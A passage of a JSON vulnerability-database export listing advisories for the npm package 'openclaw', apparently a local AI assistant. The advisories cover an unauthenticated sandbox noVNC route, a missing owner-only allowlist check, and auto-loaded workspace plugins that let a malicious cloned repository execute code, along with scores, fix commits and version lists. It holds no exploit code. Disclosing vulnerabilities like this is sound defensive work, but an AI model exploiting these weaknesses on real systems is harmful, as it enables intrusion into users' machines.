ID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-42421","GHSA-5h3f-885m-v22w"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ntwt-jkgr-sffu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89684?format=json","vulnerability_id":"VCID-nv6g-7gs9-pfan","summary":"OpenClaw: Sandbox noVNC helper route exposed interactive browser session credentials\n## Summary\n\nSandbox noVNC helper route exposed interactive browser session credentials.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `>= 2026.2.21 < 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nThe sandbox noVNC helper route could be reached without the intended bridge authentication, exposing an interactive browser session surface.\n\n## Technical Details\n\nThe fix gates the sandbox noVNC helper route behind bridge authentication.\n\n## Fix\n\nThe issue was fixed in #63882. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `8dfbf3268bd224b7377d1ecca77a445100746085`\n- PR: #63882\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/8dfbf3268bd224b7377d1ecca77a445100746085","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/8dfbf3268bd224b7377d1ecca77a445100746085"},{"reference_url":"https://github.com/openclaw/openclaw/pull/63882","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/63882"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-92jp-89mq-4374","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-92jp-89mq-4374"},{"reference_url":"https://github.com/advisories/GHSA-92jp-89mq-4374","reference_id":"GHSA-92jp-89mq-4374","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-92jp-89mq-4374"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["GHSA-92jp-89mq-4374"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nv6g-7gs9-pfan"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89754?format=json","vulnerability_id":"VCID-nw4r-wjgs-8qc1","summary":"OpenClaw: /allowlist omits owner-only enforcement for cross-channel allowlist writes\n## Impact\n\n/allowlist omits owner-only enforcement for cross-channel allowlist writes.\n\nAn authorized non-owner sender could attempt allowlist writes against a different channel.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=v2026.4.1`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @zsxsoft and @KeenSecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41910","reference_id":"","reference_type":"","scores":[{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.2513","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.25179","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00088","scoring_system":"epss","scoring_elements":"0.25193","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41910"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:04:48Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vc32-h5mq-453v","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:04:48Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vc32-h5mq-453v"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41910","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41910"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-missing-owner-only-enforcement-in-allowlist-cross-channel-writes","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:04:48Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-missing-owner-only-enforcement-in-allowlist-cross-channel-writes"},{"reference_url":"https://github.com/advisories/GHSA-vc32-h5mq-453v","reference_id":"GHSA-vc32-h5mq-453v","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vc32-h5mq-453v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-41910","GHSA-vc32-h5mq-453v"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nw4r-wjgs-8qc1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90908?format=json","vulnerability_id":"VCID-nzu6-7a1g-4kf2","summary":"OpenClaw: Workspace plugin auto-discovery allowed code execution from cloned repositories\n### Summary\n\nOpenClaw automatically discovered and loaded plugins from `.openclaw/extensions/` inside the current workspace without an explicit trust or install step. A malicious repository could include a crafted workspace plugin that executed as soon as a user ran OpenClaw from that cloned directory.\n\n### Impact\n\nOpening or running OpenClaw in an untrusted repository could lead to arbitrary code execution under the user's account.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.11`\n\n### Patch\n\nFixed in `openclaw` `2026.3.12`. Workspace plugin loading now requires explicit trusted state before execution. Users should update to `2026.3.12` or later and avoid running OpenClaw inside untrusted repositories on older releases.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32920","reference_id":"","reference_type":"","scores":[{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04205","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00019","scoring_system":"epss","scoring_elements":"0.05411","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32920"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-99qw-6mr3-36qr","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T15:03:17Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-99qw-6mr3-36qr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32920","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32920"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-auto-discovery-of-workspace-plugins","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T15:03:17Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-auto-discovery-of-workspace-plugins"},{"reference_url":"https://github.com/advisories/GHSA-99qw-6mr3-36qr","reference_id":"GHSA-99qw-6mr3-36qr","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-99qw-6mr3-36qr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps